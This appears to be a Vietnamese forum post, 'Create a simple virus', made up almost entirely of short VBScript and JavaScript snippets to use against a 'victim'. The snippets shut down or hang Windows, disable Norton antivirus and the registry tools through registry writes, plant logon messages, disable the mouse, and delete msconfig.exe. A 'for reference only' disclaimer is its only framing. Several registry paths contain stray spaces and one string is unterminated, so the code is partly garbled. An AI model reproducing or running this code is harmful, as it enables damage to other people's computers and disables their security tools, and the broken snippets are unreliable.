Tạo Virus đơn giản

[admin]

Có thể một số chương trình không đúng. Có gì Report để mình sửa lại nếu có thể (vì nguồn sưu tầm)
Chỉ với Notepad hay Wordpad là bạn đã có thể tự tạo cho mình 1 "chú" Virus dưới dạng VBSCRIPT hoặc Javascript . Ở đây tôi chỉ giới thiệu cấu trúc của 1 con virus thông thường, không khuyến khích các bạn tạo ra chúng mà chỉ tham khảo thôi, các bạn nên cân nhắc kỹ trước khi thử nghiệm, nó có thể làm hỏng PC của bạn đấy )

Dưới đây là code của một số con virus nhỏ dưới dạng VBS:

1. Không cho victim khởi động máy:

Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"

2. Disable NAV:

Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\S ervi c es\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"

3. Hiển thị một message mỗi khi reboot máy:
dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = "HKLM\Software\Microsoft\Windows\CurrentVersio n\Wi n Logon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "http://allformy.topcities.com"
wsh.RegWrite s1+s3, "Ta la anti_100-Toi den tu mobileworld.vn"

4. Hiển thị một dòng lệnh khi click vào file hay folder:,

set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Ban da bi toi khong che"
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Ban da bi toi khong che","I_LOVE_U"

5. Làm cho các "trò" trên hoạt động bình thường:

Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1 = "HKEY_USERS\.Default\Software\Microsoft\Window s\CurrentVersion\ "
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"

Dưới dạng Javascipt :

// Winlogon when reboot
var s1 = "HKLM\\Software\\Microsoft\\Windows\\CurrentVe rsio n \\WinLogon\\";
var s2 = "LegalNoticeCaption";
var s3 = "LegalNoticeText";
wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ;
wsh.RegWrite (s1+s3, "Ban da bi toi khong che") ;

//Disable Registry
var s1 = "HKEY_USERS\\.Default\\Software\\Microsoft\\Wi ndow s\\CurrentVers ion\\";
var s2 = "Policies\\System\\DisableRegistryTools" ;
wsh.RegWrite (s1+s2,0,"REG_DWORD");

//Delete file Msconfig.exe làm cho victim khởi động tới Registry luôn
var fso;
fso=new ActiveXObject("Scripting.FileSystemObject");
var fe=fso.getfile("C:\\windows\\msconfig.exe);
fe.delete true;

//Disable Mouse
wsh.run ("RUNDLL32.EXE mouse,disable");

//Hang up windows
wsh.run ("rundll32 user,disableoemlayer");